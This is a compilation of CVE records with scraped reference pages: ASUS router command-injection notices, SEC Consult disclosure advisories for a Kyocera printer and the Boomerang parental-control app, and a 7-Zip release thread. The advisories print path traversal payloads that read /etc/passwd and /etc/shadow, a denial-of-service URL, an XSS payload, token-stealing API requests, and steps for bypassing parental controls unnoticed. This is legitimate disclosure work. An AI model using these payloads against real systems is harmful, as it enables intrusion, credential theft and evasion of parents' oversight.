ASUS RT-AC86U’s authentication-related function has a vulnerability of insufficient filtering of special characters within its code-authentication module. An authenticated remote attacker can exploit this vulnerability to perform a Command Injection attack to execute arbitrary commands, disrupt the system or terminate services.

:::

*   首頁
*   資安服務
*   台灣漏洞揭露平台 (TVN)
*   TVN (Taiwan Vulnerability Note) 漏洞公告

TVN ID

TVN-202311005

CVE ID

CVE-2023-41348

CVSS

8.8 (High)  
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

影響產品

RT-AX55: 3.0.0.4.386.51598

問題描述

華碩 RT-AC86U 與驗證相關的確認驗證碼功能未對特殊參數作過濾，經驗證之遠端攻擊者可利用此漏洞進行Command Injection攻擊，執行系統任意指令，並導致阻斷系統與終止服務。

解決方法

更新版本至3.0.0.4.386\_51948

漏洞通報者

資安人員

公開日期

2023-11-03

CVE-2023-41348: ASUS RT-AX55 - command injection - 4

ASUS RT-AC86U’s authentication-related function has a vulnerability of insufficient filtering of special characters within its token-refresh module. An authenticated remote attacker can exploit this vulnerability to perform a Command Injection attack to execute arbitrary commands, disrupt the system or terminate services.

:::

*   首頁
*   資安服務
*   台灣漏洞揭露平台 (TVN)
*   TVN (Taiwan Vulnerability Note) 漏洞公告

TVN ID

TVN-202311003

CVE ID

CVE-2023-41346

CVSS

8.8 (High)  
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

影響產品

RT-AX55: 3.0.0.4.386.51598

問題描述

華碩 RT-AC86U 與驗證相關的更新token功能未對特殊參數作過濾，經驗證之遠端攻擊者可利用此漏洞進行Command Injection攻擊，執行系統任意指令，並導致阻斷系統與終止服務。

解決方法

更新版本至3.0.0.4.386\_51948

漏洞通報者

資安人員

公開日期

2023-11-03

CVE-2023-41346: ASUS RT-AX55 - command injection - 2

Lost and Found Information System 1.0 allows account takeover via username and password to a /classes/Users.php?f=save URI.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-38965: vulnreability-code-review-php/Lost and Found Information System v1.0.txt at main · Or4ngm4n/vulnreability-code-review-php

Kyocera TASKalfa 4053ci printers through 2VG_S000.002.561 allow identification of valid user accounts via username enumeration because they lead to a "nicht einloggen" error rather than a falsch error.

**Full Disclosure mailing list archives****SEC Consult SA-20230705-0 :: Path traversal bypass & Denial of service in Kyocera TASKalfa 4053ci printer**

_From_: "SEC Consult Vulnerability Lab, Research via Fulldisclosure" <fulldisclosure () seclists org>  
_Date_: Wed, 5 Jul 2023 07:51:10 +0000  

SEC Consult Vulnerability Lab Security Advisory < 20230705-0 >
=======================================================================
               title: Path traversal bypass & Denial of service
             product: Kyocera TASKalfa 4053ci printer
  vulnerable version: TASKalfa 4053ci Version <= 2VG\_S000.002.561
       fixed version: 2VG\_S000.002.574
         CVE numbers: CVE-2023-34259, CVE-2023-34260, CVE-2023-34261
              impact: High
            homepage: https://global.kyocera.com
               found: 2022-12-13
                  by: Stefan Michlits (Office Vienna)
                      Gorazd Jank (Office Vienna)
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Eviden business
                      Europe | Asia

                      https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"Kyocera Document Solutions is leading the digital shift driving productivity
and growth in the printing industry. We offer a range of exciting new options
that draw on the combined resources of the Kyocera Group."

Source: https://www.kyoceradocumentsolutions.com/en/our-business/inkjet/

Business recommendation:
------------------------
SEC Consult recommends Kyocera customers to install the latest updates.

Furthermore, an in-depth security analysis performed by security professionals
is highly advised, as the software may be affected from other security issues.


Vulnerability overview/description:
-----------------------------------
1) Path Traversal - Bypass (CVE-2023-34259)
A path traversal vulnerability was found by Hakan Eren ŞAN in 2020-06-06.
The previous exploit can be found at: https://www.exploit-db.com/exploits/48561
Kyocera has fixed the vulnerability. It was not possible to access arbitrary
files using the public exploit. However, SEC Consult have found a bypass to
exploit this vulnerability again and access arbitrary files. Due to the fact
that the web service is running as the user root, it was possible to access all
files (e.g. /etc/shadow) on the device.

2) Denial-of-Service - Web Interface (CVE-2023-34260)
The denial-of-service vulnerability is related to the path traversal
vulnerability. Instead of requesting a file, a directory will be requested.
Once the request is sent to the web service running on TCP port 443, the web
service will become unresponsive and must be restarted.

3) User Enumeration (CVE-2023-34261)
The login function on the web service running on TCP port 443 is prone to a
user enumeration vulnerability. The login function will return different
responses, whether the username is valid or not.


Proof of concept:
-----------------
1) Path Traversal - Bypass (CVE-2023-34259)
Previously, a security researcher has discovered an unauthenticated directory
traversal vulnerability in the web service running on port 443. The following
payload was used to access arbitrary files:

https://IP/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm

This vulnerability is fixed in the current version. It was not possible to
access arbitrary files using the above payload. However, the vulnerability was
not fixed correctly. SEC Consult identified a bypass to exploit this
vulnerability again.

Once the ../ sequences will be URL encoded, it is possible to bypass the fix
and access arbitrary files. The following payload can be used to access the
file /etc/passwd:

https://IP/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd%00index.htm

The response containing the contents of the file /etc/passwd can be seen
in the following paragraph.
-------------------------------------------------------------------------------
HTTP/1.1 200 OK
Content-Length: 770
Accept-Encoding: identity
Server: KM-MFP-http/V0.0.1
Content-Type: text/html
X-Frame-Options: SAMEORIGIN

root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
sshd:x:100:1000:Linux User,,,:/var/run/sshd:/bin/false
-------------------------------------------------------------------------------

Also, it was possible to access the file /etc/shadow. The following payload can
be used:

https://IP/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/shadow%00index.htm

The output containing the content of the file /etc/shadow as it can be seen in
the following paragraph.
-------------------------------------------------------------------------------
HTTP/1.1 200 OK
Content-Length: 401
Accept-Encoding: identity
Server: KM-MFP-http/V0.0.1
Content-Type: text/html
X-Frame-Options: SAMEORIGIN

root:$1$tfE2pkl/$O8uDq\*\*\*\*\*\*\*\*\*\*\*\*\*bSH.:11029::::::
daemon:\*:11029::::::
bin:\*:11029::::::
sys:\*:11029::::::
sync:\*:11029::::::
games:\*:11029::::::
man:\*:11029::::::
lp:\*:11029::::::
mail:\*:11029::::::
news:\*:11029::::::
uucp:\*:11029::::::
proxy:\*:11029::::::
www-data:\*:11029::::::
backup:\*:11029::::::
list:\*:11029::::::
irc:\*:11029::::::
gnats:\*:11029::::::
nobody:\*:11029::::::
sshd:x:11029::::::
-------------------------------------------------------------------------------
As the web service is running as the user root it was possible to access the
/etc/shadow file or the file has set the wrong permissions.

Based on previous security assessments of Kyocera printers, it is likely that
the service is running as the user root.


2) Denial-of-Service - Web Interface (CVE-2023-34260)
To trigger the DoS attack it is sufficient to navigate to the URL:

https://IP/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%00index.htm

Once the request is sent to the web service, the web service will become
unresponsive.

This attack is related to the path traversal vulnerability. The difference is
that in this case a folder is requested instead of a file. Apparently, this
leads to an error condition in the web server causing it to be unresponsive for
all users. Other applications offering a web interface (e.g., on port 8083)
seem to not be affected by the attack.


3) User Enumeration (CVE-2023-34261)
The user enumeration is located in the login functionality of the web
interface. Submitting an existing username will result in a different server
response than submitting an incorrect username. This enables attackers to
enumerate existing users by submitting potential usernames till a different
response is gathered. In this case, it does not matter whether the transmitted
password is correct or not. The gathered information could be used to better
search for default passwords or custom passwords inside of public password
leaks.
In case, the username does not exist, the response will return
"Login-Benutzername oder Passwort falsch.", on the other hand, if the
username exists the response contains "Sie können sich nicht einloggen."



Vulnerable / tested versions:
-----------------------------
The following product has been tested:
\* Kyocera TASKalfa 4053ci

All versions older than "2VG\_S000.002.561" are vulnerable according to the vendor.


Vendor contact timeline:
------------------------
2023-02-13: Asking for Kyocera KC-SIRT security contact through Nippon CSIRT
             Association; quick response: https://www.nca.gr.jp/member/kc-sirt.html
             (it seems only the Japanese website shows the email information)
2023-02-14: Contacting Kyocera KC-SIRT through kc-sirt () gp kyocera jp
2023-03-02: Contacting the vendor again, due to no response.
2023-03-06: Vendor response, KDC-PSIRT is responsible, requesting security advisory.
2023-03-13: Sending security advisory PGP-encrypted.
2023-04-19: Vendor response, vulnerabilities confirmed.
2023-05-19: Vendor response, the vulnerabilities were fixed. The patch will be
             released on 2023-05-26.
2023-05-22: Informing vendor that we will request CVE numbers, asking for
             information about affected & fixed version numbers.
2023-05-24: Vendor provides version information.
2023-06-02: Sending CVE numbers to vendor, asking for link to patch download.
2023-06-05: Vendor provides download information.
2023-07-05: Public release of security advisory.


Solution:
---------
The vendor provided the following download information:

There are two ways to update the firmware of our products.
\* One is to contact the shop of purchase and update the firmware from a service person.
\* The other is to use the Firmware Upgrade tool. From the Kyocera Document Solutions
   Global website in your country, you can download this tool and latest firmware.
   Then you update the firmware yourself.
   See: https://www.kyoceradocumentsolutions.com/download/ and choose "TASKalfa4053ci"


Workaround:
-----------
None


Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Eviden business
Europe | Asia

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Eviden business. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec\_consult

EOF S. Michlits, G. Jank / @2023
\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

**Current thread:**

*   **SEC Consult SA-20230705-0 :: Path traversal bypass & Denial of service in Kyocera TASKalfa 4053ci printer** _SEC Consult Vulnerability Lab, Research via Fulldisclosure (Jul 07)_

CVE-2023-34261: Path traversal bypass & Denial of service in Kyocera TASKalfa 4053ci printer

An issue was discovered in the Boomerang Parental Control application through 13.83 for Android. The child can use Safe Mode to remove all restrictions temporarily or uninstall the application without the parents noticing.

**Full Disclosure mailing list archives****SEC Consult SA-20230628-0 :: Stored XSS & Privilege Escalation in Boomerang Parental Control App**

_From_: "SEC Consult Vulnerability Lab, Research via Fulldisclosure" <fulldisclosure () seclists org>  
_Date_: Wed, 28 Jun 2023 07:29:21 +0000  

SEC Consult Vulnerability Lab Security Advisory < 20230628-0 >
=======================================================================
               title: Stored XSS & Privilege Escalation
             product: Boomerang Parental Control App
  vulnerable version: <13.83
       fixed version: >=13.83 (only issue 1), rest not fixed
          CVE number: CVE-2023-36620, CVE-2023-36621
              impact: High
            homepage: https://nationaledtech.com
               found: 2022-09-29
                  by: Fabian Densborn (Office Vienna)
                      Bernhard Gründling (Office Vienna)
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Eviden business
                      Europe | Asia

                      https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"National Education Technologies Inc. is a manufacturer of mobile
applications. Their portfolio ranges from parental control apps, to
safe browsing apps, to digital wellbeing apps."

Source: https://nationaledtech.com

Business recommendation:
------------------------
The vendor only provides an update for one of the identified security issues,
but it effectively reduces the risk of some of the other vulnerabilities, which
are currently not fixed yet. The vendor could not provide a timeline when the
rest of the issues will be patched.
If possible, limit the possibility to boot into Android safe mode. Otherwise
children are always able to bypass any restrictions.

An in-depth security analysis performed by security professionals is
highly advised, to identify and resolve potential further critical security
issues.


Vulnerability overview/description:
-----------------------------------
1) ADB Backup allowed (CVE-2023-36620)
The app is missing the android:allowBackup="false" attribute in the
manifest which allows the user to backup the internal memory of the
app to a PC. This gives the user access to the device (in case ADB is enabled)
and API token which are used to authenticate requests to the API.

2) Stored XSS
The customizable name of the child's device can be used to trigger a XSS
payload in the parent web dashboard. Children might be able to attack
their parents' account.

3) Trigger parent control functions from child device (Privilege Escalation)
A device token in the form of a UUID is used as a session token for the parent
and the child device. The parent device token is leaked on an endpoint which
is accessible by the child, which is equivalent to leaking the session token.
This token can then be used to authenticate requests to the API and get the same
access rights as the parent. This would allow a child to bypass restrictions
and access device settings.

4) Disable Child App Restriction without Parent's notice (CVE-2023-36621)
The child can remove all restrictions temporarily or uninstall the application
without the parents noticing.


Proof of concept:
-----------------
1) ADB Backup allowed (CVE-2023-36620)
The internals of the app can be backed up to a PC by connecting the device
and running the following commands. As a prerequisite, the ADB feature
must be enabled or being used via recovery. Children could bypass any Android
setting restrictions via vulnerability 3).

--------------------------------------------------------------------------------
adb backup -apk com.nationaledtech.Boomerang
dd if=backup.ab bs=24 skip=1 | zlib-flate -uncompress | tar xf -
--------------------------------------------------------------------------------

The internal data contains the device and API token which are used to
communicate with the API.


2) Stored XSS
As the internal memory including the device and API token is backup-able (see 1),
it is possible to construct arbitrary requests to the API in the name
of the child. The following payload can be used to change the device name
and trigger an alert box in the dashboard of the parent:

--------------------------------------------------------------------------------
POST /services/DeviceService.svc/RenameDevice HTTP/1.1
Accept: application/json
Content-Type: application/json;charset=UTF-8
Content-Length: 1470
Host: app.useboomerang.com

{
     "DeviceToken": <child-device-token>,
     "ApiToken": <child-api-token>,
     "DeviceTitle":"\\"\\/><img src=\\"x\\" onerror=\\"alert(1)\\"\\/>",
     "TargetDeviceToken": <child-device-token>
}
--------------------------------------------------------------------------------


3) Access parent control functions from child device (Privilege Escalation)
When visiting the Family Messenger Tab within the application on the device, a GET
request to API endpoint \`/services/FamilyService.svc/GetAllFamilyDevices\` will be
sent and the response contains all DeviceTokens associated with the account
(including the ones of parent devices).

To be able to query the \`/services/FamilyService.svc/GetAllFamilyDevices\`
endpoint an attacker first needs to backup their device and get access to their
own device and API token. Then an attacker is able to create their own request
querying the device token of the parent.

--------------------------------------------------------------------------------
POST /services/FamilyService.svc/GetAllFamilyDevices HTTP/1.1
Accept: application/json
Content-Type: application/json;charset=UTF-8
Content-Length: 54
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 4a Build/RQ2A.210305.006)
Host: app.useboomerang.com
Connection: close
Accept-Encoding: gzip, deflate

{"DeviceToken":"<child-token>"}
--------------------------------------------------------------------------------

Response:
--------------------------------------------------------------------------------
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Connection: close
Content-Length: 450

{
        "content":null,
        "isSuccessful":true,
        "Devices":\[
                {
                        "DeviceToken":"\[parent-token\]",
                        \[...\]
                }
        \]
}
--------------------------------------------------------------------------------

With the DeviceToken of the parent, the API token can be retrieved from the
\`/services/DeviceService.svc/UpdateStatus\` endpoint:

--------------------------------------------------------------------------------
POST /services/DeviceService.svc/UpdateStatus HTTP/1.1
Host: app.useboomerang.com
Accept: application/json
Content-Type: application/json
User-Agent: Boomerang/234 CFNetwork/1240.0.4 Darwin/20.5.0
Accept-Language: en-us
Content-Length: 55
Accept-Encoding: gzip, deflate
Connection: close


{"DeviceToken": <parent-token>,}
--------------------------------------------------------------------------------

As the device token combined with the API token are used to authenticate requests
to the API, the child now has the same access rights as the parent.


4) Disable Child App Restriction without Parent's notice (CVE-2023-36621)
The child can disable the restrictions of the application without the parents
noticing. For this, the following steps are necessary:
a) Turn off Internet connectivity on the child device or block access to the
    API server (e.g. on the router).
b) Reboot into Android Safe Mode.
c) Disable Device Admin, "Display over other apps", Usage Access, Accessibility
    Permissions for the app in Android settings.
d) After rebooting in to normal mode, the child device can be used without
    restrictions. For example, previously locked apps can now be used. The parent's
    application will show that Protection is still on and the last check-in time.
    Internet must stay off on the child device during this.
e) After usage of the restricted apps is finished, the mentioned permissions are
    turned back on.
f) The device is restarted to clear any cached HTTP requests of the app that might
    inform the parent.
g) Internet is re-enabled. The parent's device will not see an indication of these
    activities on their device.

Alternatively, the Boomerang app can also be uninstalled after disabling the Device
Admin permission in step 3. Internet can then be turned on as well on the child's
device without any notification to the parent. The only way for the parent to notice
this would be to manually check the last check-in time.

The "Safe Mode Bypass" cannot be exploited on Samsung KNOX capable devices, as
special restrictions can be set in order to disable booting into safe mode.


Vulnerable / tested versions:
-----------------------------
The following version has been tested and downloaded from the Google Play store,
which was the most recent version available at the time of the initial test:
\* Android app version 13.53

Later on, version 13.61 (2022-10-25) and 13.68 (2022-12-13) have been verified to be
vulnerable as well.


Vendor contact timeline:
------------------------
2022-11-23: Contacting vendor through support () useboomerang com and
             support () nationaledtech com
2022-11-23: Response from vendor: "We got your email but can't
             understand it - maybe it was sent by accident? How can we help?"
2022-11-24: Explaining that our email was no accident and that we want
             to send our security advisory over encrypted channels to the vendor .
             No response.
2022-12-05: Notifying vendor again that we found critical security
             issues and where to send the advisory to.
             No response.
2022-12-15: Still no response, informing vendor again about the planned
             release date of 12th January, informing them that a blog post
             is planned with an overview about security issues in
             parental control apps for next week.
2022-12-15: Vendor response: "Hi. I can't understand this attachment. What
             is the issue?"
2022-12-16: Explaining "responsible disclosure" to the vendor again, asking
             where to send the advisory and that a blog post is planned, as
             well as the advisory release for 12th January.
2022-12-20: Published blog post (https://r.sec-consult.com/parents), asked
             vendor again where to send the security advisory.
2022-12-21: Vendor reply, please send advisory via email. Seems like all
             previous answers from the vendor were not properly received
             (mail server problem).
2022-12-21: Advisory was sent to vendor.
2023-01-11: Advisory was sent directly to mail addresses of vendor, not via
             support mail address. Vendor confirms receipt now.
2023-02-14: Asking for a status update; no response.
2023-02-28: Asking for a status update again, vendor answers that "some issues"
             have been fixed but they are still checking what is pending.
2023-03-02: Vendor responds that local backup vulnerability will be fixed soon,
             backend changes are reviewed, no timeline.
2023-05-09: Asking for a status update, informing vendor about security advisory
             release plan for May.
2023-05-19: Vendor: Only local backup vulnerability is fixed, backend parts
             are on the roadmap.
2023-05-22: Asking about a timeline/estimation for this roadmap to fix the backend
             vulnerabilities and which version includes the fix for issue 1).
2023-05-30: Vendor: latest version on Google Play v13.83 has ADB backup fix
2023-05-31: Sending current advisory version to vendor, setting preliminary
             release date to end of June, asking for timeline again, asking whether
             there are any issues in incorporating the fixes for the other
             vulnerabilities.
             No response.
2023-06-28: Release of security advisory.


Solution:
---------
According to the vendor, only issue 1) has been fixed in version 13.83, the other security
issues are still not fixed yet. Please contact the vendor for further information
regarding their timeline.


Workaround:
-----------
Be aware that children might be able to bypass any imposed restrictions.
If possible, disable booting into Android Safe Mode which works on Samsung Knox-
enabled smart phones.


Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Eviden business
Europe | Asia

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Eviden business. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec\_consult

EOF F. Densborn, B. Gründling / @2023
\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

**Current thread:**

*   **SEC Consult SA-20230628-0 :: Stored XSS & Privilege Escalation in Boomerang Parental Control App** _SEC Consult Vulnerability Lab, Research via Fulldisclosure (Jul 07)_

CVE-2023-36621: Stored XSS & Privilege Escalation in Boomerang Parental Control App

7-Zip through 22.01 on Linux allows an integer underflow and code execution via a crafted 7Z archive.

*   Home
*   Browse
*   7-Zip
*   Discussion

**A free file archiver for extremely high compression**

*   Summary
*   Files
*   Reviews
*   Support
*   Wiki
*   Tickets ▾
    *   Support Requests
    *   Patches
    *   Bugs
    *   Feature Requests
*   News
*   Discussion

Menu ▾ ▴

**7-Zip 23.00**

Created: 2023-05-07

Updated: 2023-09-27

*   **7-Zip 23.00 (beta) was released.**
    
    **Download**
    
    7-Zip for 64-bit Windows x64:  
    https://7-zip.org/a/7z2300-x64.exe
    
    7-Zip for 32-bit Windows x86:  
    https://7-zip.org/a/7z2300.exe
    
    7-Zip for 64-bit Windows ARM64:  
    https://7-zip.org/a/7z2300-arm64.exe
    
    7-Zip (console version) for 64-bit Linux x86-64 (AMD64):  
    https://7-zip.org/a/7z2300-linux-x64.tar.xz
    
    7-Zip (console version) for 32-bit Linux x86:  
    https://7-zip.org/a/7z2300-linux-x86.tar.xz
    
    7-Zip (console version) for 64-bit Linux ARM64:  
    https://7-zip.org/a/7z2300-linux-arm64.tar.xz
    
    7-Zip (console version) for 64-bit Linux ARM:  
    https://7-zip.org/a/7z2300-linux-arm.tar.xz
    
    7-Zip (console version) for macOS (ARM64 and x86-64):  
    https://7-zip.org/a/7z2300-mac.tar.xz
    
    7-Zip Extra: standalone console version, 7z DLL, Plugin for Far Manager:  
    https://www.7-zip.org/a/7z2300-extra.7z
    
    **What's new after 7-Zip 22.01:**
    
    *   7-Zip now can use new ARM64 filter for compression to 7z and xz archives. ARM64 filter can increase compression ratio for data containing executable files compiled for ARM64 (AArch64) architecture.  
        Also 7-Zip now parses executable files (that have exe and dll filename extensions) before compressing, and it selects appropriate filter for each parsed file:
        *   BCJ or BCJ2 filter for x86 executable files,
        *   ARM64 filter for ARM64 executable files.  
            Previous versions by default used x86 filter BCJ or BCJ2 for all exe/dll files.
    *   Default section size for BCJ2 filter was changed from 64 MiB to 240 MiB. It can increase compression ratio for executable files larger than 64 MiB.
    *   UDF: support was improved.
    *   cpio: support for hard links.
    *   Some changes and optimizations in WIM creation code.
    *   When new 7-Zip creates multivolume archive, 7-Zip keeps in open state only volumes that still can be changed. Previous versions kept all volumes in open state until the end of the archive creation.
    *   7-Zip for Linux and macOS now can reduce the number of simultaneously open files, when 7-Zip opens, extracts or creates multivolume archive. It allows to avoid the failures for cases with big number of volumes, bacause there is a limitation for number of open files allowed for a single program in Linux and macOS.
    *   There are optimizations in code for 7-Zip's context menu in Explorer: the speed of preparing of the menu showing was improved for cases when big number of files were selected by external program for context menu that contains 7-Zip menu commands.
    *   There are changes in code for the drag-and-drop operations to and from 7-Zip File Manager.  
        And the drag-and-drop operation with right button of mouse now is supported for some cases.
    *   The bugs were fixed:
        *   ZIP archives: if multithreaded zip compression was performed with more than one file to stdout stream (-so switch), 7-zip didn't write "data descriptor" for some files.
        *   ext4 archives: 7-Zip couldn't correctly extract symbolic link to directory from ext4 archives.
        *   HFS and APFS archives: 7-Zip incorrectly decoded uncompressed blocks (64 KiB) in compressed forks.
        *   Some another bugs were fixed.
    
    Source code will be available later.
    
    There are internal changes in source code across the whole code. So some new bugs are possible in this new version. That is why this version is marked as "beta" in this forum message.  
    If you see new bugs and problems that have appeared in this 23.00 version, please write about it in this forum thread.
    
     
    
    Last edit: Igor Pavlov 2023-05-07
    

*   Thanks, Igor, I can't wait to test drive the new version.😃
    

*    
    
    Last edit: AlexS 2023-05-07
    
    *   -myx was changed.  
        7-Zip in default -myx5 mode now parses exe and dll files to select arm64 or x86 filter.  
        Also 7-Zip can select ia64 (Itanium) and armt (ARM-Thumb) filters. But these Itanium and ARM-Thumb exe and dll files now are rare cases.
        
         
        
        Last edit: Igor Pavlov 2023-05-07
        

*   Since the 7zz executable in the macOS archive above will only extract files correctly on versions of macOS that have a utimensat() system call, it would be better to describe that archive more precisely:
    
    7-Zip (console version) for macOS **10.13 or newer** (ARM64 and x86-64):  
    https://7-zip.org/a/7z2300-mac.tar.xz
    
    On versions of macOS before 10.13, only the first file of an archive is extracted, and 7zz dies when trying to set the first extracted file’s timestamp with the missing utimensat() system call.
    
     
    
    Last edit: Christian Carey 2023-05-08
    

*   Here is updated English (United Kingdom) language.
    

*   Hi, i updated my previous translation of brazilian portuguese for 23.00's release.
    

*   Great!
    
    Would be possible, for the next beta, to have an option to list supported archive files first, such as WinRar does?
    

*   Thx for the new update, Igor.
    

*   Wow, one more update with the same boring interface from 25 years ago 🥱 Thanks for reminding us of Windows 98 when we open 7zip 😮‍💨
    
    *   give him a break, he is a one man operation, as far as I know.
        
    *   Funny, I was just thinking, wow, 24 years, and still creating amazing compression software, for free. The dedication is amazing. The interface is adequate for purpose. I use console version a lot as well as GUI, on Linux, Android (Termux), WSL, Windows. Everywhere I need (de)compression, automation, etc., 7-Zip is there for me, and I am grateful. If the GUI bothers you so much, get the source, modify it, share with others. Next time, try to write code for 24 years rather than complain for 24 years.
        
    *   What a dumb comment, you get 7-Zip for free and post crap like this? Why don't you just choose an alternative instead of spreading negative rubbish?
        
         
        
        Last edit: str() 2023-05-09
        
    *   but that interface is good (Extract Here and Extract To "name\" are separate options)
        

*    
    
    Last edit: HITCHER 2023-05-10
    

*   Hello Igor,
    
    I don't know if the topic has ever been discussed before. But is there any chance that 7zip will open and decompress lzip archives? I will be very grateful for your answer.
    
    Best regards  
    WT
    
    *   no plans for lzip support now.
        
        *   Thank you for the information.
            
            Best regards,  
            WT
            
    *   Hi, Witold,
        
        other developers have created their own adaptations of 7-Zip to add the ability to decompress lzip archives:
        
        *   https://github.com/mcmilk/7-Zip-zstd — 7-Zip ZS 22.01 (the full installation, not the Zstandard codec plugin), only for Windows;
        *   https://download.savannah.gnu.org/releases/lzip/7zip/ — a set of source code patches for 7-Zip 16.04, which if you’re comfortable with compiling your own software, could be adapted to patching newer source code versions of 7-Zip. (That’s what the 7-Zip ZS developers have done.)
        
        I haven’t tried either adaptation above. If you don’t use Windows and you’re not comfortable with compiling your own software, then continuing to use a standalone lzip program could be the simplest option.
        
        *   Thank you for your tip, Christian. I have tried the ZS edition. It suits me very well :-) It works very nicely under Windows desktop.
            
            Best regards,  
            WT
            

*   

*   On the About 7-Zip dialog, the version says 23.00, but it doesn't say 23.00 beta.
    
    *   "beta" marker of 23.00 is mentioned only here at forum.  
        So it's just additional warning for user before dowloading.  
        It can show to potential user that the code is new, and it's not so robust is final "non-beta" releases.  
        Next version of 7-Zip will be "23.01" or "23.01 beta".  
        There will be no any another "non-beta" 23.00.
        

*   Thanks for a great tool with a clean and easy interface!  
    One tiny wish: the cmd 7za version with the -stl switch: 'set archive timestamp from the most recently modified file' uses a folder stamp, if the folder is more recent than the most recent file stamp. Not a big thing but sometimes it is very useful to get the most recent modified file stamp instead as originally intended.  
    Please keep up the good work.
    
